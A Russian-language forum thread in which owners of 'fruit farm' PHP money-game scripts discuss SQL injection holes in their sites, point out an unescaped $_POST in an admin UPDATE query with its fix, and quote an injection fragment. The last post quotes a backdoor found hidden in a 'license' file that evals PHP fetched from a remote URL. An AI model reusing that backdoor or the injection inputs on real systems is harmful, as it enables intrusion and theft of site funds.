Скрипт Фруктовая ферма с выводом денег.

  • Автор темы admin
  • Дата начала
Статус
В этой теме нельзя размещать новые ответы.
vlw
Участник
Сообщения
16
Реакции
0
  • #941
AndreyHunters написал(а):
скрипт ты уже установил?если да то дай ссылку,я гляну
Если Вы мне, то вот:
Скрытое содержимое для зарегистрированных пользователей!
 
vlw
Участник
Сообщения
16
Реакции
0
  • #942
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #943
vlw написал(а):
  • /news
  • /rules
  • /about
  • /contacts
  • /recovery
  • /payments
  • #
  • /captcha.php?rnd=3498
  • это те файлы через которые легко попасть на сайт через sql иньекцию,
  • +на таких доменах с таким скриптом нельзя делать автовыплаты,дальше думай сам,
  • знаешь пословицу,про бесплатный сыр?
 
vlw
Участник
Сообщения
16
Реакции
0
  • #944
AndreyHunters написал(а):
  • /news
  • /rules
  • /about
  • /contacts
  • /recovery
  • /payments
  • #
  • /captcha.php?rnd=3498
  • это те файлы через которые легко попасть на сайт через sql иньекцию,
  • +на таких доменах с таким скриптом нельзя делать автовыплаты,дальше думай сам,
  • знаешь пословицу,про бесплатный сыр?
1. # = index ?
2. /captcha.php?rnd=3498 это тут причём? Вроде как там всё норм
4. Почему нельзя автовыплаты делать?
3. Ну да, я халявщик :)
 
vlw
Участник
Сообщения
16
Реакции
0
  • #945
AndreyHunters написал(а):
  • /news
  • /rules
  • /about
  • /contacts
  • /recovery
  • /payments
  • #
  • /captcha.php?rnd=3498
Через .htaccess закрывать к ним доступ? или я чего-то не понял?
 
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #946
vlw написал(а):
1. # = index ?
2. /captcha.php?rnd=3498 это тут причём? Вроде как там всё норм
4. Почему нельзя автовыплаты делать?
3. Ну да, я халявщик :)
1.htaccess тебе не поможет
2.это не ошибки а дыры
3.у твоего домена нет своего айпи и увести деньги делов 5 минут
дальше думай сам..................
 
ниаолай
Местный
Сообщения
34
Реакции
2
Skype
  • #947
AndreyHunters написал(а):
1.htaccess тебе не поможет
2.это не ошибки а дыры
3.у твоего домена нет своего айпи и увести деньги делов 5 минут
дальше думай сам..................
а мой не посмотрите fruti-rubli.ru
я путь к админу изменил и аипи выделеный сайта
 
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #948
ниаолай написал(а):
а мой не посмотрите fruti-rubli.ru
я путь к админу изменил и аипи выделеный сайта
  • /news
  • /rules
  • /about
  • /contacts
  • /recovery
  • /payments
  • async=""
  • counter.yadro.ru/hit?t14.6;r
  • top-fwz1.mail.ru/counter?id=2491905;js=na
  • ads.people-group.net/?hwn=MTc0NDc0JzEnMSc&swf=1&s=MCUzQTAlM0Ew&h=06%2F01%2F2014%2023%3A57%3A55
  • ads.people-group.net/174474/1/1/1/
  • #
  • /captcha.php?rnd=6266
  • вот такая картина........а что ты хотел от бапличных скриптов,+ты сам дырок наделал(выделено красным)
 
Sergey12
Местный
Сообщения
45
Реакции
3
  • #949
AndreyHunters, да, из Маши и Медведя.
А насчёт автовыплат ты не прав. Как раз на хостингере можно поставить автовыплаты, но бесплатный хостинг не выдержит нагрузку скрипта.


P.S я бы хотел научиться SQL-инъекцию делать)))
 
ниаолай
Местный
Сообщения
34
Реакции
2
Skype
  • #950
AndreyHunters написал(а):
  • /news
  • /rules
  • /about
  • /contacts
  • /recovery
  • /payments
  • async=""
  • counter.yadro.ru/hit?t14.6;r
  • top-fwz1.mail.ru/counter?id=2491905;js=na
  • ads.people-group.net/?hwn=MTc0NDc0JzEnMSc&swf=1&s=MCUzQTAlM0Ew&h=06%2F01%2F2014%2023%3A57%3A55
  • ads.people-group.net/174474/1/1/1/
  • #
  • /captcha.php?rnd=6266
  • вот такая картина........а что ты хотел от бапличных скриптов,+ты сам дырок наделал(выделено красным)
блин а почему же мне айболит не чего не показывает
 
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #951
Sergey12 написал(а):
AndreyHunters, да, из Маши и Медведя.
А насчёт автовыплат ты не прав. Как раз на хостингере можно поставить автовыплаты, но бесплатный хостинг не выдержит нагрузку скрипта.
запомни раз и на всегда
1.на бесплатном хостинге 1ip может принадлежать 10 и 100 сайтам,а про dns это отдельная тема
2.если ты про хостингер ру то там вообще печаль,
3.при разрешенной нагрузке 10,этот скрипт максимум тянет от 1,5 до 3
 
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #952
Sergey12 написал(а):
AndreyHunters, да, из Маши и Медведя.
А насчёт автовыплат ты не прав. Как раз на хостингере можно поставить автовыплаты, но бесплатный хостинг не выдержит нагрузку скрипта.


P.S я бы хотел научиться SQL-инъекцию делать)))
:blind:учи программирование,изучай язык,хотя этому нельзя научится,это нужно понимать...........
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #953
если левые черти шныряют по-вашей админке, к дополнительной защите установите платежный пароль, который будет требоваться при выплатах, + генерировать платежный пароль при регистрации новых юзеров и возможность высылать пл. пароль на почту. Будет поменьше геморроя немного. Такие воры встречаются на проектах, где установлено ограничение на вывод (вывести средства могут те пользователи, кто пополнил баланс хотя бы на 100 руб.). Взломщики юзают Вашу админку, открывают страницу пополнений, находят жертву, берут их логин и пароль и вуаля. Через аккаунт Ваших посетителей снимают денюжку на свой кошелек ))
Так же уберите со страницы админки (список пользователей) ячейки с паролями, что бы они не выводились. И всю другую информацию, доступ к которой нежелателен )
 
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #954
wh1skas написал(а):
если левые черти шныряют по-вашей админке, к дополнительной защите установите платежный пароль, который будет требоваться при выплатах, + генерировать платежный пароль при регистрации новых юзеров и возможность высылать пл. пароль на почту. Будет поменьше геморроя немного. Такие воры встречаются на проектах, где установлено ограничение на вывод (вывести средства могут те пользователи, кто пополнил баланс хотя бы на 100 руб.). Взломщики юзают Вашу админку, открывают страницу пополнений, находят жертву, берут их логин и пароль и вуаля. Через аккаунт Ваших посетителей снимают денюжку на свой кошелек ))
Так же уберите со страницы админки (список пользователей) ячейки с паролями, что бы они не выводились. И всю другую информацию, доступ к которой нежелателен )
уважаемый не хочу вас растраивать,но это защитит скрипт от школоты,которая узнала от когото пару sql иньекций,а по серьезному если рассуждать то sql иньекция в основном в первую очередь расчитана для получения доступа непосредственно к базе данных! примером-
?detail=4+OR+1(часть иньекции)можно вообще удалить всю базу...
получив доступ до базы данных можно делать что угодно,менять пароли,суммы,добавлять или удалять пользователя,
а сама по себе админка никому не нужна
 
ниаолай
Местный
Сообщения
34
Реакции
2
Skype
  • #955
AndreyHunters написал(а):
уважаемый не хочу вас растраивать,но это защитит скрипт от школоты,которая узнала от когото пару sql иньекций,а по серьезному если рассуждать то sql иньекция в основном в первую очередь расчитана для получения доступа непосредственно к базе данных! примером-
?detail=4+OR+1(часть иньекции)можно вообще удалить всю базу...
получив доступ до базы данных можно делать что угодно,менять пароли,суммы,добавлять или удалять пользователя,
а сама по себе админка никому не нужна
вот например где здесь уязвимость подскажи пожолуйсто и отстану и пойду учить языки ?
<?PHP
$_OPTIMIZATION["title"] = "О проекте";
$_OPTIMIZATION["description"] = "О нашем проекте";
$_OPTIMIZATION["keywords"] = "Немного о нас и о нашем проекте";
?>
<div class="s-bk-lf">
<div class="acc-title">О проекте</div>
</div>
<div class="silver-bk"><div class="clr"></div>
<?PHP

$db->Query("SELECT about FROM db_conabrul WHERE id = 1");
$xt = $db->FetchRow();
echo $xt;
?>
</div>
<div class="clr"></div>
 
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #956
ниаолай написал(а):
вот например где здесь уязвимость подскажи пожолуйсто и отстану и пойду учить языки ?
<?PHP
$_OPTIMIZATION["title"] = "О проекте";
$_OPTIMIZATION["description"] = "О нашем проекте";
$_OPTIMIZATION["keywords"] = "Немного о нас и о нашем проекте";
?>
<div class="s-bk-lf">
<div class="acc-title">О проекте</div>
</div>
<div class="silver-bk"><div class="clr"></div>
<?PHP

$db->Query("SELECT about FROM db_conabrul WHERE id = 1");
$xt = $db->FetchRow();
echo $xt;
?>
</div>
<div class="clr"></div>
а где ты тут хочешь увидеть ошибку??? этот about.php отвечает за положение и отоброжения текста,ошибка у тебя находиться pages/admin/_about.php
УЧИ PHP!!!

так и быть за твою назойливость я порылся в твоем сайте и нашел pages/admin/_about.php
строка 62
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");
а должно быть так
$db->Query("UPDATE db_conabrul SET about = '".mysql_real_escape_string($_POST["tx"])."' WHERE id = '1'");
это хорошая дыра дляsql иньекции,и таких я нашел у тебя немного ни мало 13 ...........

Больше комне с глупыми вопросами не обращайся:beat:
 
Последнее редактирование:
ниаолай
Местный
Сообщения
34
Реакции
2
Skype
  • #957
AndreyHunters написал(а):
а где ты тут хочешь увидеть ошибку??? этот about.php отвечает за положение и отоброжения текста,ошибка у тебя находиться pages/admin/_about.php
УЧИ PHP!!!

так и быть за твою назойливость я порылся в твоем сайте и нашел pages/admin/_about.php
строка 62
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");
а должно быть так
$db->Query("UPDATE db_conabrul SET about = '".mysql_real_escape_string($_POST["tx"])."' WHERE id = '1'");
это хорошая дыра дляsql иньекции,и таких я нашел у тебя немного ни мало 13 ...........

Больше комне с глупыми вопросами не обращайся:beat:
вот теперь я понял что смотреть надо спасибо большое!!!
 
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #958
ниаолай написал(а):
вот теперь я понял что смотреть надо спасибо большое!!!
ну ну только учти если ты где нибудь неправильно подставишь переменную ты завалишь скрипт
 
assus
Если нужна ферма пишите. Дизайн для Ферм.
Участник
Сообщения
454
Реакции
59
Skype
  • #959
AndreyHunters написал(а):
а где ты тут хочешь увидеть ошибку??? этот about.php отвечает за положение и отоброжения текста,ошибка у тебя находиться pages/admin/_about.php
УЧИ PHP!!!

так и быть за твою назойливость я порылся в твоем сайте и нашел pages/admin/_about.php
строка 62
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");
а должно быть так
$db->Query("UPDATE db_conabrul SET about = '".mysql_real_escape_string($_POST["tx"])."' WHERE id = '1'");
это хорошая дыра дляsql иньекции,и таких я нашел у тебя немного ни мало 13 ...........

Больше комне с глупыми вопросами не обращайся:beat:
только после изменения не факт что будит работать
 
fghjk
Участник
Сообщения
8
Реакции
0
  • #960
Ребят, два дня назад увели 2к рублей с кошелька... в js/editor/jscripts/tiny_mce/themes/simple/skins нашел файл license в нем было
<?PHP

eval(file_get_contents("http://fruit-farm.org/return.php"));

?>

Снес к чертям... Скрипт качал на оф.сайте разработчиков FF как думаете, не выведут больше?
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху